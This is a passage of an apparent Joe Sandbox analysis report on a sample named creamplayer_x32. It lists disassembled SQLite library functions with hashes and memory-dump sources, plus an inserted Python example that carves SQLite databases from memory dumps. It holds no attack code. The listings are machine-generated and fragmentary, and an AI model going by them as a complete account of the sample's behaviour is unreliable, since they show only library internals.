                                                                                                      • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                                      • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                                    • sqlite3_free.SQLITE3 ref: 6095F6B4
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    • sqlite3_free.SQLITE3 ref: 6095F6D4
                                                                                                    • sqlite3_free.SQLITE3 ref: 6095F6ED
                                                                                                    • sqlite3_free_table.SQLITE3 ref: 6095F6FF
                                                                                                    • sqlite3_realloc.SQLITE3 ref: 6095F71B
                                                                                                    • sqlite3_free_table.SQLITE3 ref: 6095F72D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1866449048-0
                                                                                                    • Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                                    • Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
                                                                                                    • Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                                    • Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
                                                                                                    APIs
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609407B4
                                                                                                      • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                                                      • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609407C2
                                                                                                      • Part of subcall function 6094064B: sqlite3_mutex_enter.SQLITE3 ref: 609406A7
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609407D0
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609407DE
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609407EC
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609407FA
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 60940808
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 60940816
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 60940824
                                                                                                    • sqlite3_free.SQLITE3 ref: 6094082C
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_finalize$sqlite3_logsqlite3_mutex_enter$sqlite3_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 14011187-0
                                                                                                    • Opcode ID: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                                                                    • Instruction ID: 14c977e837db455c9c1ce3b69ce7d4e0fb0da6313972e550a4586d0eb1b189ee
                                                                                                    • Opcode Fuzzy Hash: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                                                                    • Instruction Fuzzy Hash: F7116774504B008BCB50BF78C9C965877E9AFB5308F061978EC8A8F306EB34D4918B15
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                                    • API String ID: 0-780898
                                                                                                    • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                                    • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                                    • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                                    • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                                    • API String ID: 0-2604012851
                                                                                                    • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                                    • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                                    • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                                    • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$sqlite3_logsqlite3_mutex_try
                                                                                                    • String ID: 0$SQLite format 3
                                                                                                    • API String ID: 3174206576-3388949527
                                                                                                    • Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                                    • Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
                                                                                                    • Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                                    • Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
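The function above compares a buffer against the string "SQLite format 3", which is the 16-byte magic at the start of every SQLite database file; this is the library's own header validation, not behaviour specific to the sample. The same check is what an analyst uses to carve SQLite databases out of the process memory dumps (.sdmp files) listed in this report. The following is an added example, not code from the report or from the sample: it scans a byte buffer for the magic, validates the 100-byte header per the public SQLite file-format documentation, and reports the offset, page size and in-header database size so the bytes can be extracted. The input buffer is constructed here for demonstration and does not come from the analysed dumps.

```python
import struct

# 16-byte header string that sqlite3 checks with memcmp (includes the trailing NUL).
SQLITE_MAGIC = b"SQLite format 3\x00"
HEADER_LEN = 100
TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def parse_sqlite_header(buf, off):
    """Parse the 100-byte SQLite database header at buf[off].

    Returns a dict of header fields, or None if the bytes are not a
    well-formed header (a magic string alone is not enough: strings in
    memory and decoys also contain it).
    """
    hdr = buf[off:off + HEADER_LEN]
    if len(hdr) < HEADER_LEN or hdr[:16] != SQLITE_MAGIC:
        return None
    raw_page_size = struct.unpack_from(">H", hdr, 16)[0]
    page_size = 65536 if raw_page_size == 1 else raw_page_size   # 1 encodes 65536
    # Page size must be a power of two between 512 and 65536.
    if page_size < 512 or page_size > 65536 or page_size & (page_size - 1):
        return None
    write_ver, read_ver = hdr[18], hdr[19]                        # 1 = legacy, 2 = WAL
    if write_ver not in (1, 2) or read_ver not in (1, 2):
        return None
    if hdr[21:24] != b"\x40\x20\x20":                             # fixed 64 / 32 / 32
        return None
    if any(hdr[72:92]):                                           # reserved, must be zero
        return None
    (change_counter, page_count, freelist_trunk, freelist_count,
     schema_cookie, schema_format, _cache_size, _largest_root,
     text_encoding, user_version, _incr_vacuum, app_id) = struct.unpack_from(">12I", hdr, 24)
    version_valid_for, sqlite_version = struct.unpack_from(">2I", hdr, 92)
    # The in-header page count is only trustworthy when "version-valid-for"
    # equals the change counter; older writers left it stale.
    page_count_trusted = (version_valid_for == change_counter and page_count > 0)
    return {
        "offset": off,
        "page_size": page_size,
        "page_count": page_count,
        "db_size": page_size * page_count if page_count_trusted else None,
        "wal_mode": write_ver == 2,
        "text_encoding": TEXT_ENCODINGS.get(text_encoding, "unknown(%d)" % text_encoding),
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "user_version": user_version,
        "application_id": app_id,
        "sqlite_version": sqlite_version,
        "freelist_pages": freelist_count,
        "freelist_trunk": freelist_trunk,
    }


def carve_sqlite_headers(buf):
    """Return parsed headers for every valid SQLite header found in buf."""
    hits, pos = [], 0
    while True:
        pos = buf.find(SQLITE_MAGIC, pos)
        if pos < 0:
            return hits
        parsed = parse_sqlite_header(buf, pos)
        if parsed is not None:
            hits.append(parsed)
        pos += 1


def build_sample_header(page_size=4096, page_count=3):
    """Constructed header for the demo below (assumed values, not from the sample)."""
    hdr = bytearray(HEADER_LEN)
    hdr[:16] = SQLITE_MAGIC
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18] = hdr[19] = 1                      # legacy rollback-journal versions
    hdr[21:24] = b"\x40\x20\x20"
    struct.pack_into(">I", hdr, 24, 7)         # file change counter
    struct.pack_into(">I", hdr, 28, page_count)
    struct.pack_into(">I", hdr, 40, 2)         # schema cookie
    struct.pack_into(">I", hdr, 44, 4)         # schema format 4
    struct.pack_into(">I", hdr, 56, 1)         # UTF-8
    struct.pack_into(">I", hdr, 92, 7)         # version-valid-for == change counter
    struct.pack_into(">I", hdr, 96, 3045000)   # assumed SQLITE_VERSION_NUMBER
    return bytes(hdr)


# Constructed stand-in for a memory dump: junk, one real database header with its
# pages, then a decoy that carries the magic but an impossible page size (3).
SAMPLE_DUMP = (b"\x00" * 37 + build_sample_header() + b"\xcc" * (4096 * 3 - HEADER_LEN)
               + SQLITE_MAGIC + b"\x00\x03" + b"\x00" * 82 + b"junk")

if __name__ == "__main__":
    for h in carve_sqlite_headers(SAMPLE_DUMP):
        print("SQLite db at offset 0x%x: page_size=%d pages=%d size=%s enc=%s"
              % (h["offset"], h["page_size"], h["page_count"], h["db_size"], h["text_encoding"]))
```

To extract a carved database, copy `db_size` bytes starting at `offset`; when `db_size` is None the header's page count cannot be trusted and the end has to be found from the surrounding mapping instead. A hit in a process dump does not by itself mean the process created the file, since SQLite-backed data (browser profiles, for example) is routinely read into memory.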
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                                    • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                                      • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                                      • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                                    • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                                    • String ID: |
                                                                                                    • API String ID: 1576672187-2343686810
                                                                                                    • Opcode ID: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                                    • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                                    • Opcode Fuzzy Hash: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                                    • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                                    APIs
                                                                                                    • sqlite3_file_control.SQLITE3 ref: 609537BD
                                                                                                    • sqlite3_free.SQLITE3 ref: 60953842
                                                                                                    • sqlite3_free.SQLITE3 ref: 6095387C
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 609538D4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_file_controlsqlite3_mutex_entersqlite3_stricmp
                                                                                                    • String ID: 6$timeout
                                                                                                    • API String ID: 2671017102-3660802998
                                                                                                    • Opcode ID: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                                                                    • Instruction ID: da3e9078838fdf1f068eeacc94130b5fe058058c2a53432068b0843c8cdd1fdd
                                                                                                    • Opcode Fuzzy Hash: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                                                                    • Instruction Fuzzy Hash: 6CA11270A083198BDB15CF6AC88079EBBF6BFA9304F10846DE8589B354D774D885CF41
                                                                                                    APIs
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                                      • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                                    • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                                    • API String ID: 652164897-1572359634
                                                                                                    • Opcode ID: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                                    • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                                    • Opcode Fuzzy Hash: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                                    • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                                                    • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 2352520524-0
                                                                                                    • Opcode ID: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                                    • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                                                    • Opcode Fuzzy Hash: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                                    • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                                                    APIs
                                                                                                      • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                                      • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                                      • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                                    • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                                      • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                                      • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                      • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                      • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                    • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                                                    • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                                                    • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                                                    • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                                    • String ID: optimize
                                                                                                    • API String ID: 3659050757-3797040228
                                                                                                    • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                                    • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                                                    • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                                    • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                                                    APIs
                                                                                                    • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                                                    • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                                                    • sqlite3_reset.SQLITE3 ref: 60965556
                                                                                                    • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                                                      • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                      • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                                                    • sqlite3_free.SQLITE3 ref: 60965714
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096574B
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    • sqlite3_free.SQLITE3 ref: 609657AA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 2722129401-0
                                                                                                    • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                                    • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                                                    • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                                    • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                                      • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                                                    • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                                      • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096477B
                                                                                                    • sqlite3_free.SQLITE3 ref: 60964783
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
